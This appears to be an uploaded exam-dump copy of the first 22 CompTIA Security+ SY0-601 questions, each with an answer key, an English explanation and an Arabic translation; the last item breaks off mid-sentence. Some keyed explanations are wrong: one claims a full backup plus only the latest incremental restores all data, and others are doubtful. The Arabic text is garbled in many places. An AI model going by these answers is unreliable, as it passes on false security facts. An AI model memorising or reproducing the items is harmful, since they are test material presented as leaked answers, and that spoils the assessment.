Uploaded by ldoran97

DUMPS SY0-601 مترجم

advertisement
DUMPS
BASE
QUESTION & ANSWER
HIGHER QUALITY
BETTER SERVICE
Provide One Year Free Update!
https://www.dumpsbase.com
The safer , easier way to help you pass any IT exams.
Exam
:
SY0-601
Title
:
CompTIA Security+ Exam
Version :
V23.02
1 / 198
The safer , easier way to help you pass any IT exams.
1. The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but
mustbe able to associate potential malicious activity to a specific person.
Which of the following would BEST allow this objective to be met?
A. Requiring all new, on-site visitors to configure their devices to use WPS
B. Implementing a new SSID for every event hosted by the college that has visitors
C. Creating a unique PSK for every visitor when they arrive at the reception area
D. Deploying a captive portal to capture visitors' MAC addresses and names
Answer: D
Explanation:
A captive portal is a web page that requires visitors to authenticate or agree to an acceptable use
policybefore allowing access to the network. By capturing visitors' MAC addresses and names, potential
malicious activity can be traced back to a specific person.
‫يرغب كبير مسؤولي التكنولوجيا في الكلية المحلية في أن يستخدم الزوار شبكة الوايف اي الخاصة بالمدرسة ولكن يجب أن يكونوا قادرين على ربط‬
‫النشاط الضار المحتمل بشخص معين‬.
‫أي مما يلي يسمح بتحقيق هذا الهدف على أفضل وجه؟‬
‫مطالبة جميع الزوار الجدد في الموقع بتكوين أجهزتهم الستخدام‬
‫جديد لكل فعالية تستضيفها الكلية ولديها زوار تطبيق‬
‫فريد لكل زائر عند وصوله إلى منطقة االستقبال إنشاء‬
‫للزوار نشر بوابة مقيدة اللتقاط عناوين وأسماء‬
‫ د‬:‫إجابه‬
‫تفسير‬:
‫ من خالل‬.‫البوابة المقيدة هي صفحة ويب تتطلب من الزوار المصادقة أو الموافقة على سياسة استخدام مقبولة قبل السماح بالوصول إلى الشبكة‬
‫ يمكن تتبع النشاط الضار المحتمل إلى شخص معين التقاط عناوين وأسماء‬، ‫للزوار‬.
2. The security team received a report of copyright infringement from the IP space of the
corporatenetwork. The report provided a precise time stamp for the incident as well as the name
of the copyrighted files. The analyst has been tasked with determining the infringing source
machine and instructed to implement measures to prevent such incidents from occurring again.
Which of the following is MOST capable of accomplishing both tasks?
A. HIDS
B. Allow list
C. TPM
D. NGFW
Answer: D
Explanation:
Next-Generation Firewalls (NGFWs) are designed to provide advanced threat protection by combining
traditional firewall capabilities with intrusion prevention, application control, and other security features.
NGFWs can detect and block unauthorized access attempts, malware infections, and other suspicious
activity. They can also be used to monitor file access and detect unauthorized copying or distribution of
copyrighted material.
A next-generation firewall (NGFW) can be used to detect and prevent copyright infringement by
analyzing network traffic and blocking unauthorized transfers of copyrighted material. Additionally,
NGFWs can be configured to enforce access control policies that prevent unauthorized access to
sensitive resources.
2 / 198
‫‪The safer , easier way to help you pass any IT exams.‬‬
‫تلقى فريق الأمن تقريرا عن انتهاك حقوق الطبع والنشر من مساحة ‪ IP‬لشبكة الشركة‪ .‬قدم التقرير طابعا زمنيا دقيقا للحادث‬
‫بالإضافة إلى اسم الملفات المحمية بحقوق الطبع والنشر‪ .‬تم تكليف المحلل بتحديد آلة المصدر المخالفة وأصدر تعليمات‬
‫لتنفيذ تدابير لمنع حدوث مثل هذه الحوادث مرة أخرى‪ .‬أي مما يلي هو الأكثر قدرة على إنجاز كلتا المهمتين؟‬
‫تم تصميم جدران الحماية من الجيل التالي (‪ )NGFWs‬لتوفير حماية متقدمة من التهديدات من خلال الجمع بين إمكانات جدار‬
‫الحماية التقليدية ومنع التطفل والتحكم في التطبيقات وميزات الأمان الأخرى‪ .‬يمكن ل ‪ NGFWs‬اكتشاف ومنع محاولات‬
‫الوصول غير المصرح بها والإصابات بالبرامج الضارة والأنشطة المشبوهة الأخرى‪ .‬يمكن استخدامها أيضا لمراقبة الوصول إلى‬
‫الملفات واكتشاف النسخ أو التوزيع غير المصرح به للمواد المحمية بحقوق الطبع والنشر‪ .‬يمكن استخدام جدار الحماية من‬
‫الجيل التالي (‪ )NGFW‬لاكتشاف ومنع انتهاك حقوق الطبع والنشر من خلال تحليل حركة مرور الشبكة ومنع عمليات النقل غير‬
‫المصرح بها للمواد المحمية بحقوق الطبع والنشر‪ .‬بالإضافة إلى ذلك‪ ،‬يمكن تكوين ‪ NGFWs‬لفرض سياسات التحكم في‬
‫الوصول التي تمنع الوصول غير المصرح به إلى الموارد الحساسة‪.‬‬
‫‪3.A security administrator is setting up a SIEM to help monitor for notable events across the enterprise.‬‬
‫?‪Which of the following control types does this BEST represent‬‬
‫‪A. Preventive‬‬
‫‪B. Compensating‬‬
‫‪C. Corrective‬‬
‫‪D. Detective‬‬
‫‪Answer: D‬‬
‫‪Explanation:‬‬
‫‪A SIEM is a security solution that helps detect security incidents by monitoring for notable events across‬‬
‫‪the enterprise. A detective control is a control that is designed to detect security incidents and respond to‬‬
‫‪them. Therefore, a SIEM represents a detective control.‬‬
‫‪.‬يقوم مسؤول الأمان بإعداد ‪ SIEM‬للمساعدة في مراقبة الأحداث البارزة عبر المؤسسة‪ .‬أي من أنواع التحكم التالية يمثلها هذا‬
‫‪BEST‬؟ الوقائيه تعويض تصحيحي إجابة المخبر‪ D :‬التفسير‪ SIEM :‬هو حل أمني يساعد في اكتشاف الحوادث الأمنية من خلال‬
‫مراقبة الأحداث البارزة عبر المؤسسة‪ .‬التحكم في المباحث هو عنصر تحكم مصمم لاكتشاف الحوادث الأمنية والاستجابة لها‪.‬‬
‫لذلك ‪ ،‬يمثل ‪ SIEM‬عنصر تحكم المباحث‪.‬‬
‫‪4.A systems engineer is building a new system for production.‬‬
‫?‪Which of the following is the FINAL step to be performed prior to promoting to production‬‬
‫‪A. Disable unneeded services.‬‬
‫‪B. Install the latest security patches.‬‬
‫‪C. Run a vulnerability scan.‬‬
‫‪D. Encrypt all disks.‬‬
‫‪Answer: C‬‬
‫‪Explanation:‬‬
‫‪Running a vulnerability scan is the final step to be performed prior to promoting a system to production.‬‬
‫‪This allows any remaining security issues to be identified and resolved before the system is put into‬‬
‫‪production.‬‬
‫‪ .‬مهندس نظم يقوم ببناء نظام جديد للإنتاج‪ .‬أي مما يلي هو الخطوة النهائية التي يجب القيام بها قبل الترقية إلى الإنتاج؟‬
‫تعطيل الخدمات غير الضرورية‪ .‬قم بتثبيت أحدث تصحيحات الأمان‪ .‬قم بتشغيل فحص الثغرات الأمنية‪ .‬تشفير جميع الأقراص‪.‬‬
‫تفسير‪ :‬يعد إجراء فحص الثغرات الأمنية الخطوة الأخيرة التي يجب إجراؤها قبل ترقية النظام إلى الإنتاج‪ .‬يسمح ذلك بتحديد أي‬
‫مشكلات أمنية متبقية وحلها قبل وضع النظام في الإنتاج‬
‫‪3 / 198‬‬
The safer , easier way to help you pass any IT exams.
5.A security analyst is reviewing the vulnerability scan report for a web server following an incident.
Thevulnerability that was used to exploit the server is present in historical vulnerability scan reports, and
a patch is available for the vulnerability.
Which of the following is the MOST likely cause?
A. Security patches were uninstalled due to user impact.
B. An adversary altered the vulnerability scan reports
C. A zero-day vulnerability was used to exploit the web server
D. The scan reported a false negative for the vulnerability
Answer: A
Explanation:
A security patch is a software update that fixes a vulnerability or bug that could be exploited by attackers.
Security patches are essential for maintaining the security and functionality of systems and applications.
If the vulnerability that was used to exploit the server is present in historical vulnerability scan reports,
and a patch is available for the vulnerability, it means that the patch was either not applied or was
uninstalled at some point. A possible reason for uninstalling a security patch could be user impact, such
as performance degradation, compatibility issues, or functionality loss.
The other options are not correct because:
B. An adversary altered the vulnerability scan reports. This could be a possibility, but it is less likely than
option
A. An adversary would need to have access to the vulnerability scan reports and be able to modify them
without being detected.
Moreover, altering the reports would not prevent the patch from being applied or uninstalled.
C. A zero-day vulnerability was used to exploit the web server. This is not correct because a zero-day
vulnerability is a vulnerability that is unknown to the public or the vendor, and therefore has no patch
available. The question states that a patch is available for the vulnerability that was used to exploit the
server.
D. The scan reported a false negative for the vulnerability. This is not correct because a false negative is
when a scan fails to detect a vulnerability that is present. The question states that the vulnerability is
present in historical vulnerability scan reports, which means that it was detected by previous scans.
According to CompTIA Security+ SY0-601 Exam Objectives 1.4 Given a scenario, analyze potential
indicators to determine the type of attack:
“A security patch is a software update that fixes a vulnerability or bug that could be exploited by
attackers.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.getastra.com/blog/security-audit/vulnerability-scanning-report/
. ‫ الثغرة األمنية التي تم‬.‫يقوم محلل األمان بمراجعة تقرير فحص الثغرات األمنية لخادم ويب بعد وقوع حادث‬
‫ ويتوفر تصحيح للثغرة األمنية‬،‫استخدامها الستغالل الخادم موجودة في تقارير فحص الثغرات األمنية التاريخية‬.
‫أي مما يلي هو السبب األكثر احتماال؟‬
‫تم إلغاء تثبيت تصحيحات األمان بسبب تأثير المستخدم‬.
‫قام أحد الخصوم بتغيير تقارير فحص الثغرات األمنية‬
‫تم استخدام ثغرة يوم الصفر الستغالل خادم الويب‬
‫أبلغ الفحص عن سلبية خاطئة للثغرة األمنية‬
4 / 198
The safer , easier way to help you pass any IT exams.
6.A company wants to modify its current backup strategy to modify its current backup strategy to
minimize the number of backups that would need to be restored in case of data loss.
Which of the following would be the BEST backup strategy:
A. Incremental backups followed by differential backups
B. Full backups followed by incremental backups
C. Delta backups followed by differential backups
D. Incremental backups followed by delta backups
E. Full backup followed by different backups
Answer: B
Explanation:
The best backup strategy for minimizing the number of backups that need to be restored in case of data
loss is full backups followed by incremental backups. This strategy allows for a complete restoration of
data by restoring the most recent full backup followed by the most recent incremental backup.
‫تريد الشركة تعديل استراتيجية النسخ االحتياطي الحالية لتعديل استراتيجية النسخ االحتياطي الحالية لتقليل عدد النسخ االحتياطية التي قد تحتاج إلى‬
: ‫استعادتها في حالة فقد البيانات اي مما يلي سيكون أفضل استراتيجية نسخ احتياطي‬
‫النسخ االحتياطية التزايدية متبوعة بالنسخ االحتياطية التفاضلية‬
‫نسخ احتياطية كاملة متبوعة بنسخ احتياطية تزايدية‬
‫نسخ احتياطية من دلتا متبوعة بنسخ احتياطية تفاضلية‬
‫النسخ االحتياطية التزايدية متبوعة بنسخ احتياطية دلتا‬
‫نسخ احتياطي كامل متبوعا بنسخ احتياطية مختلفة‬
7.A network engineer and a security engineer are discussing ways to monitor network operations.
Which of the following is the BEST method?
A. Disable Telnet and force SSH.
B. Establish a continuous ping.
C. Utilize an agentless monitor
D. Enable SNMPv3 With passwords.
Answer: C
Explanation:
An agentless monitor is the best method to monitor network operations because it does not
require any software or agents to be installed on the devices being monitored, making it less intrusive
and less likelyto disrupt network operations. This method can monitor various aspects of network
operations, such as traffic, performance, and security.
‫ وفرض‬Telnet ‫ أي مما يلي هو أفضل طريقة؟ تعطيل‬.‫يناقش مهندس شبكات ومهندس أمن طرق مراقبة عمليات الشبكة‬.
.‫ بكلمات مرور‬SNMPv3 ‫ استخدم شاشة بدون وكيل قم بتمكين‬.‫ مستمر‬ping ‫ إنشاء اختبار‬.SSH
‫تعد الشاشة بدون وكيل أفضل طريقة لمراقبة عمليات الشبكة لأنها لا تتطلب تثبيت أي برامج أو وكلاء على الأجهزة التي تتم‬
‫ يمكن لهذه الطريقة مراقبة الجوانب المختلفة لعمليات‬.‫ مما يجعلها أقل تدخلا وأقل عرضة لتعطيل عمليات الشبكة‬، ‫مراقبتها‬
.‫ مثل حركة المرور والأداء والأمان‬، ‫الشبكة‬
5 / 198
The safer , easier way to help you pass any IT exams.
8.An enterprise needs to keep cryptographic keys in a safe
manner.Which of the following network appliances can achieve this
goal?
A. HSM
B. CASB
C. TPM
D. DLP
Answer: A
Explanation:
Hardware Security Module (HSM) is a network appliance designed to securely store cryptographic
keys
and perform cryptographic operations. HSMs provide a secure environment for key management and can
be used to keep cryptographic keys safe from theft, loss, or unauthorized access. Therefore, an enterprise
can achieve the goal of keeping cryptographic keys in a safe manner by using an HSM appliance.
‫ أي من أجهزة الشبكة التالية يمكنه تحقيق هذا الهدف؟‬.‫تحتاج المؤسسة إلى االحتفاظ بمفاتيح التشفير بطريقة آمنة‬
‫ بيئة‬HSMs ‫ توفر‬.‫) هي جهاز شبكة مصمم لتخزين مفاتيح التشفير بشكل آمن وإجراء عمليات التشفير‬HSM( ‫وحدة أمان الأجهزة‬
‫آمنة لإدارة المفاتيح ويمكن استخدامها للحفاظ على مفاتيح التشفير في مأمن من السرقة أو الضياع أو الوصول غير المصرح‬
.HSM ‫ يمكن للمؤسسة تحقيق هدف الاحتفاظ بمفاتيح التشفير بطريقة آمنة باستخدام جهاز‬، ‫ لذلك‬.‫به‬
9.A security administrator wants to implement a program that tests a user's ability to recognize
attacksover the organization's email system.
Which of the following would be BEST suited for this task?
A. Social media analysis
B. Annual information security training
C. Gamification
D. Phishing
campaignAnswer: D
Explanation:
A phishing campaign is a simulated attack that tests a user's ability to recognize attacks over the organization's
email system. Phishing campaigns can be used to train users on how to identify andreport suspicious emails.
.‫يريد مسؤول الأمان تنفيذ برنامج يختبر قدرة المستخدم على التعرف على الهجمات عبر نظام البريد الإلكتروني للمؤسسة‬.9
‫أي مما يلي سيكون الأنسب لهذه المهمة؟‬
‫ حملة التصيد الاحتيالي‬- ‫ التلعيب‬-‫ التدريب السنوي على أمن المعلومات‬- ‫تحليل وسائل التواصل الاجتماعي‬
‫ حملة التصيد الاحتيالي هي هجوم محاكاة يختبر قدرة المستخدم على التعرف على الهجمات عبر نظام البريد الإلكتروني‬:‫شرح‬
‫ يمكن استخدام حملات التصيد الاحتيالي لتدريب المستخدمين على كيفية تحديد رسائل البريد الإلكتروني المشبوهة‬.‫للمؤسسة‬
‫والإبلاغ عنها‬
6 / 198
The safer , easier way to help you pass any IT exams.
10.A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no
patches are currently available to resolve the issue. The security administrator is concerned tf servers in
the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the
service on the servers, as SMB is used by a number of internal systems and applications on the LAN.
Which of the following TCP ports should be blocked for all external inbound connections to the
DMZ as a workaround to protect the servers? (Select TWO).
A. 135
B. 139
C. 143
D. 161
E. 443
F. 445
Answer: B,F
Explanation:
To protect the servers in the company’s DMZ from external attack due to the new vulnerability in the
SMB protocol on the Windows systems, the security administrator should block TCP ports 139 and 445
for all external inbound connections to the DMZ. SMB uses TCP port 139 and 445. Blocking these ports
will prevent external attackers from exploiting the vulnerability in SMB protocol on Windows systems.
Blocking TCP ports 139 and 445 for all external inbound connections to the DMZ can help protect the
servers, as these ports are used by SMB protocol. Port 135 is also associated with SMB, but it is not
commonly used. Ports 143 and 161 are associated with other protocols and services.
‫ ولكن لا تتوفر تصحيحات حاليا لحل‬، ‫ مؤخرا‬Windows ‫ على أنظمة‬SMB ‫تم اكتشاف ثغرة أمنية جديدة في بروتوكول‬.10
‫ في المنطقة المجردة من السلاح الخاصة بالشركة ستكون عرضة‬tf ‫ يشعر مسؤول الأمن بالقلق من أن خوادم‬.‫المشكلة‬
‫ بواسطة عدد من‬SMB ‫ حيث يتم استخدام‬، ‫ لا يمكن للمسؤول تعطيل الخدمة على الخوادم‬، ‫للهجوم الخارجي ؛ ومع ذلك‬
‫ التالية يجب حظرها لكافة الاتصالات الواردة الخارجية‬TCP ‫ أي من منافذ‬.‫الأنظمة والتطبيقات الداخلية على الشبكة المحلية‬
.)‫ كحل بديل لحماية الخوادم؟ (اختر اثنين‬DMZ ‫إلى‬
‫ لحماية الخوادم في المنطقة المجردة من السلاح الخاصة بالشركة من الهجوم الخارجي بسبب الثغرة الأمنية الجديدة‬: ‫تفسير‬
‫ لجميع الاتصالات الخارجية‬445 ‫ و‬139 TCP ‫ يجب على مسؤول الأمان حظر منافذ‬، Windows ‫ على أنظمة‬SMB ‫في بروتوكول‬
‫ سيؤدي حظر هذه المنافذ إلى منع المهاجمين الخارجيين من استغلال‬.445 ‫ و‬139 TCP ‫ منفذ‬SMB ‫ يستخدم‬.DMZ ‫الواردة إلى‬
‫ لجميع الاتصالات‬445 ‫ و‬139 TCP ‫ يمكن أن يساعد حظر منافذ‬.Windows ‫ على أنظمة‬SMB ‫الثغرة الأمنية في بروتوكول‬
135 ‫ يرتبط المنفذ‬.SMB ‫ حيث يتم استخدام هذه المنافذ بواسطة بروتوكول‬، ‫ في حماية الخوادم‬DMZ ‫الخارجية الواردة إلى‬
.‫ ببروتوكولات وخدمات أخرى‬161‫ و‬143 ‫ يرتبط المنفذان‬.‫ ولكنه غير شائع الاستخدام‬، SMB ‫أيضا ب‬
7 / 198
The safer , easier way to help you pass any IT exams.
11. As part of annual audit requirements, the security team performed a review of exceptions to the
company policy that allows specific users the ability to use USB storage devices on their laptops.
The review yielded the following results.
• The exception process and policy have been correctly followed by the majority of users.
• A small number of users did not create tickets for the requests but were granted access.
• All access had been approved by supervisors.
• Valid requests for the access sporadically occurred across multiple departments.
• Access, in most cases, had not been removed when it was no longer needed
Which of the following should the company do to ensure that appropriate access is not disrupted but
unneeded access is removed in a reasonable time frame?
A. Create an automated, monthly attestation process that removes access if an employee's
supervisordenies the approval
B. Remove access for all employees and only allow new access to be granted if the employee's
supervisor approves the request
C. Perform a quarterly audit of all user accounts that have been granted access and verify the
exceptions with the management team
D. Implement a ticketing system that tracks each request and generates reports listing which employees
actively use USB storage devices
Answer: A
Explanation:
According to the CompTIA Security+ SY0-601 documents, the correct answer option is A. Create an
automated, monthly attestation process that removes access if an employee’s supervisor denies the
approval12.
This option ensures that appropriate access is not disrupted but unneeded access is removed in a
reasonable time frame by requiring supervisors to approve or deny the exceptions on a regular basis. It
also reduces the manual workload of the security team and improves the compliance with the company
policy.
‫ أجرى فريق األمان مراجعة لالستثناءات من سياسة الشركة التي تتيح لمستخدمين محددين القدرة‬، ‫كجزء من متطلبات التدقيق السنوية‬
‫ على استخدام أجهزة تخزين‬USB ‫ وأسفر االستعراض عن النتائج التالية‬.‫على أجهزة الكمبيوتر المحمولة الخاصة بهم‬.
‫تم اتباع عملية وسياسة االستثناء بشكل صحيح من قبل غالبية المستخدمين‬.
‫لم يقم عدد قليل من المستخدمين بإنشاء تذاكر للطلبات ولكن تم منحهم حق الوصول‬.
‫تمت الموافقة على جميع الوصول من قبل المشرفين‬.
‫حدثت طلبات صالحة للوصول بشكل متقطع عبر أقسام متعددة‬.
‫ لم تتم إزالته عندما لم تعد هناك حاجة إليه‬، ‫ في معظم الحاالت‬، ‫الوصول‬
‫أي مما يلي يجب على الشركة القيام به لضمان عدم تعطيل الوصول المناسب ولكن إزالة الوصول غير الضروري في إطار زمني معقول؟‬
‫الجواب الصحيح\ إنشاء عملية تصديق شهرية تلقائية تزيل الوصول إذا رفض مشرف الموظف الموافقة‬
‫ قم بإنشاء عملية تصديق شهرية تلقائية تزيل الوصول إذا رفض مشرف‬.‫ فإن خيار الإجابة الصحيح هو‬،‫ وفقا لمستندات‬:‫تفسير‬
‫الموظف الموافقة يضمن هذا الخيار عدم تعطيل الوصول المناسب ولكن تتم إزالة الوصول غير الضروري في إطار زمني‬
‫ كما أنه يقلل من عبء العمل‬.‫معقول من خلال مطالبة المشرفين بالموافقة على الاستثناءات أو رفضها على أساس منتظم‬
‫اليدوي لفريق الأمان ويحسن الامتثال لسياسة الشركة‬
8 / 198
The safer , easier way to help you pass any IT exams.
12. Which of the following describes a maintenance metric that measures the average time
required to troubleshoot and restore failed equipment?
A. RTO
B. MTBF
C. MTTR
D. RPO
Answer: C
Explanation:
Mean Time To Repair (MTTR) is a maintenance metric that measures the average time required to
troubleshoot and restore failed equipment.
‫أي مما يلي يصف مقياس الصيانة الذي يقيس متوسط الوقت المطلوب لاستكشاف أخطاء المعدات الفاشلة وإصلاحها‬
‫واستعادتها؟‬
‫) هو مقياس صيانة يقيس متوسط الوقت المطلوب لاستكشاف أخطاء المعدات الفاشلة‬MTTR( ‫متوسط وقت الإصلاح‬
.‫واستعادتها‬
13. Which of the following isa risk that is specifically associated with hesting applications iin
the publiccloud?
A. Unsecured root accounts
B. Zero day
C. Shared tenancy
D. Insider threat
Answer: C
Explanation:
When hosting applications in the public cloud, there is a risk of shared tenancy, meaning that multiple
organizations are sharing the same infrastructure. This can potentially allow one tenant to access
another tenant's data, creating a security risk.
‫أي من المخاطر التالية يرتبط على وجه التحديد بتطبيقات السحابة العامة؟‬
‫حسابات الجذر غير الآمنة يوم الصفر الإيجار المشترك تهديد من الداخل‬
‫ مما يعني أن العديد تشترك المنظمات‬، ‫ هناك خطر الإيجار المشترك‬، ‫ عند استضافة التطبيقات في السحابة العامة‬: ‫تفسير‬
‫ مما يخلق مخاطر أمنية‬،‫ يمكن أن يسمح هذا لأحد المستأجرين بالوصول إلى بيانات مستأجر آخر‬.‫في نفس البنية التحتية‬
9 / 198
The safer , easier way to help you pass any IT exams.
14. The technology department at a large global company is expanding its Wi-Fi network
infrastructure atthe headquarters building.
Which of the following should be closely coordinated between the technology, cybersecurity, and
physical security departments?
A. Authentication protocol
B. Encryption type
C. WAP placement
D. VPN configuration
Answer: C
Explanation:
WAP stands for wireless access point, which is a device that allows wireless devices to connect to a
wired network using Wi-Fi or Bluetooth. WAP placement refers to where and how WAPs are installed in
abuilding or area.
WAP placement should be closely coordinated between the technology, cybersecurity, and physical
security departments because it affects several aspects of network performance and security, such as:
✑ Coverage: WAP placement determines how well wireless devices can access the network throughout
the building or area. WAPs should be placed in locations that provide optimal signal strength and avoid
interference from other sources.
✑ Capacity: WAP placement determines how many wireless devices can connect to the network
simultaneously without affecting network speed or quality. WAPs should be placed in locations that
balance network load and avoid congestion or bottlenecks.
✑ Security: WAP placement determines how vulnerable wireless devices are to eavesdropping or
hacking attacks from outside or inside sources. WAPs should be placed in locations that minimize
exposure to unauthorized access and maximize encryption and authentication methods.
‫ أي مما يلي يجب‬.‫ في مبنى المقر الرئيسي‬Fi-Wi ‫يقوم قسم التكنولوجيا في شركة عالمية كبيرة بتوسيع البنية التحتية لشبكة‬
‫تنسيقه بشكل وثيق بين أقسام التكنولوجيا والأمن السيبراني والأمن المادي؟‬
VPN ‫ تكوين‬WAP ‫بروتوكول المصادقة نوع التشفير وضع‬
15.A company uses a drone for precise perimeter and boundary
monitoring.Which of the following should be MOST concerning to the
company?
A. Privacy
B. Cloud storage of telemetry data
C. GPS spoofing
D. Weather events
Answer: A
Explanation:
The use of a drone for perimeter and boundary monitoring can raise privacy concerns, as it may
capturevideo and images of individuals on or near the monitored premises. The company should take
measuresto ensure that privacy rights are not violated.
‫ أي مما يلي يجب أن يكون أكثر أهمية للشركة؟ الخصوصيه التخزين السحابي‬.‫ تستخدم شركة طائرة بدون طيار لمراقبة المحيط والحدود بدقة‬‫ يمكن أن يثير استخدام طائرة بدون طيار لمراقبة‬:‫ تفسير‬:‫لبيانات القياس عن بعد انتحال نظام تحديد المواقع العالمي أحداث الطقس الجواب‬
‫ يجب‬.‫ حيث قد تلتقط مقاطع فيديو وصورا للأفراد في المباني الخاضعة للمراقبة أو بالقرب منها‬، ‫المحيط والحدود مخاوف تتعلق بالخصوصية‬
‫على الشركة اتخاذ تدابير لضمان عدم انتهاك حقوق الخصوصية‬
10 / 198
The safer , easier way to help you pass any IT exams.
16. An organization wants to enable built-in FDE on all laptops.
Which of the following should the organization ensure is Installed on all laptops?
A. TPM
B. CA
C.SAML
D.CRL
Answer: A
Explanation:
The organization should ensure that a Trusted Platform Module (TPM) is installed on all laptops in
order to enable built-in Full Disk Encryption (FDE). TPM is a hardware-based security chip that
stores encryption keys and helps to protect data from malicious attacks. It is important to ensure that the
TPM isproperly configured and enabled in order to get the most out of FDE.
‫ أي مما يلي يجب أن تتأكد المؤسسة من تثبيته على‬.‫تريد المؤسسة تمكين المدمج على جميع أجهزة الكمبيوتر المحمولة‬
‫ يجب على المؤسسة التأكد من تثبيت الوحدة النمطية للنظام الأساسي‬:‫ تفسير‬TPM ‫جميع أجهزة الكمبيوتر المحمولة؟‬
‫ هي شريحة‬TPM .‫) المضمن‬FDE( ‫) على جميع أجهزة الكمبيوتر المحمولة لتمكين تشفير القرص بالكامل‬TPM( ‫الموثوق به‬
‫ من المهم التأكد من تكوين‬.‫أمان قائمة على الأجهزة تخزن مفاتيح التشفير وتساعد على حماية البيانات من الهجمات الضارة‬
.FDE ‫ وتمكينه بشكل صحيح من أجل تحقيق أقصى استفادة من‬TPM
17.A security analyst is running a vulnerability scan to check for missing patches during a
suspected security rodent During which of the following phases of the response process is this activity
MOST likelyoccurring?
A. Containment
B. Identification
C. Recovery
D. Preparation
Answer:
B
Explanation:
Vulnerability scanning is a proactive security measure used to identify vulnerabilities in the network and
systems
‫يقوم محلل أمني بإجراء فحص للثغرات الأمنية للتحقق من وجود تصحيحات مفقودة أثناء وجود قوارض أمنية مشتبه بها‬.17
‫خلال أي من المراحل التالية من عملية الاستجابة يحدث هذا النشاط على الأرجح؟‬
‫ ب‬:‫الاحتواء تعريف الانتعاش إجابة التحضير‬
‫ فحص الثغرات الأمنية هو إجراء أمني استباقي يستخدم لتحديد نقاط الضعف في الشبكة والأنظمة‬:‫الشرح‬
11 / 198
The safer , easier way to help you pass any IT exams.
18.A desktop support technician recently installed a new document-scanning software program
on acomputer. However, when the end user tried to launch the program, it did not respond.
Which of the following is MOST likely the cause?
A. A new firewall rule is needed to access the application.
B. The system was quarantined for missing software updates.
C. The software was not added to the application white list.
D. The system was isolated from the network due to infected software
Answer: C
Explanation:
The most likely cause of the document-scanning software program not responding when launched by the
end user is that the software was not added to the application whitelist. An application whitelist is a list of
approved software applications that are allowed to run on a system. If the software is not on the whitelist,
it may be blocked from running by the system's security policies. Adding the software to the whitelist
should resolve the issue and allow the program to run.
References: https://www.techopedia.com/definition/31541/application-whitelisting
‫ عندما حاول المستخدم النهائي‬، ‫ ومع ذلك‬.‫قام أحد فنيي الدعم المكتبي مؤخرا بتثبيت برنامج حاسوبي جديد لمسح المستندات ضوئيا على جهاز كمبيوتر‬
‫ لم يستجب‬، ‫تشغيل البرنامج‬
‫أي مما يلي هو السبب على األرجح؟‬
‫لم تتم إضافة البرنامج إلى القائمة البيضاء للتطبيق‬.
19. Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?
A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking
Answer: C
Explanation:
an IDS (Intrusion Detection System) and a WAF (Web Application Firewall) are both used to
monitor and protect web applications from common attacks such as cross-site scripting and
SQL injection12. However, these attacks can also be hidden in encrypted HTTPS traffic, which
uses the TLS (Transport Layer Security) protocol to provide cryptography and authentication
between two communicating applications34. Therefore, in order for an IDS and a WAF to be
effective on HTTPS traffic, they need to be able to decrypt and inspect the data that flows in
the TLS tunnel. This is achieved by using a feature called TLS inspection345, which creates two
dedicated TLS connections: one with the web server and another with the client. The firewall then
uses a customer-provided CA (Certificate Authority) certificate togenerate an on-the-fly certificate that
replaces the web server certificate and shares it with the client.This way, the firewall can see the
content of the HTTPS traffic and apply the IDS and WAF rules accordingly34.
‫؟‬HTTPS ‫ فعالين على حركة مرور‬WAF ‫ و‬IDS ‫أي مما يلي مطلوب حتى يكون‬
12 / 198
The safer , easier way to help you pass any IT exams.
20. Which of the following environments typically hosts the current version configurations and
code, compares user-story responses and workflow, and uses a modified version of actual
data for testing?
A. Development
B. Staging
C. Production
D. Test
Answer: B
Explanation:
Staging is an environment in the software development lifecycle that is used to test a modified version of
the actual data, current version configurations, and code. This environment compares user-story
responses and workflow before the software is released to the production environment.
‫ وتقارن استجابات قصة المستخدم وسير‬،‫أي من البيئات التالية تستضيف عادة تكوينات الإصدار الحالي والتعليمات البرمجية‬
‫ وتستخدم إصدارا معدلا من البيانات الفعلية للاختبار؟ تطور التدريج إنتاج اختبر‬،‫العمل‬
‫ التدريج هو بيئة في دورة حياة تطوير البرامج تستخدم لاختبار نسخة معدلة من البيانات الفعلية وتكوينات الإصدار‬:‫تفسير‬
.‫ تقارن هذه البيئة استجابات قصة المستخدم وسير العمل قبل إصدار البرنامج ببيئة الإنتاج‬.‫الحالي والتعليمات البرمجية‬
21. After a WiFi scan of a local office was conducted, an unknown wireless signal was identified
Upon investigation, an unknown Raspberry Pi device was found connected to an Ethernet port using
a single connection.
Which of the following BEST describes the purpose of this device?
A. loT sensor
B. Evil twin
C. Rogue access point
D. On-path attack
Answer: C
Explanation:
A Raspberry Pi device connected to an Ethernet port could be configured as a rogue access
point , allowing an attacker to intercept and analyze network traffic or perform other malicious activities.
Pi Raspberry ‫ تم العثور على جهاز‬، ‫ تم تحديد إشارة لاسلكية غير معروفة عند التحقيق‬، ‫ لمكتب محلي‬WiFi ‫بعد إجراء فحص‬
‫ التوأم‬loT ‫ أي مما يلي يصف الغرض من هذا الجهاز؟ مستشعر‬.‫ باستخدام اتصال واحد‬Ethernet ‫غير معروف متصلا بمنفذ‬
‫الشرير نقطة وصول مارقة هجوم على الطريق‬
‫ السماح للمهاجم باعتراض وتحليل‬، ‫ كنقطة وصول مارقة‬Ethernet ‫ المتصل بمنفذ‬Pi Raspberry ‫ يمكن تكوين جهاز‬: ‫تفسير‬
.‫حركة مرور الشبكة أو تنفيذ أنشطة ضارة أخرى‬
13 / 198
The safer , easier way to help you pass any IT exams.
22. During an investigation, the incident response team discovers that multiple administrator
accounts were suspected of being compromised. The host audit logs indicate a repeated brute-force
attack on a single administrator account followed by suspicious logins from unfamiliar geographic
locations. Which of the following data sources would be BEST to use to assess the accounts impacted
by this attack?
A. User behavior analytics
B. Dump files
C. Bandwidth monitors
D. Protocol analyzer output
Answer: A
Explanation:
User behavior analytics (UBA) would be the best data source to assess the accounts impacted by the
attack, as it can identify abnormal activity, such as repeated brute-force attacks and logins from
unfamiliar geographic locations, and provide insights into the behavior of the impacted accounts.
‫ تشير سجالت تدقيق المضيف إلى‬.‫ يكتشف فريق االستجابة للحوادث أنه تم االشتباه في اختراق حسابات مسؤول متعددة‬، ‫أثناء التحقيق‬
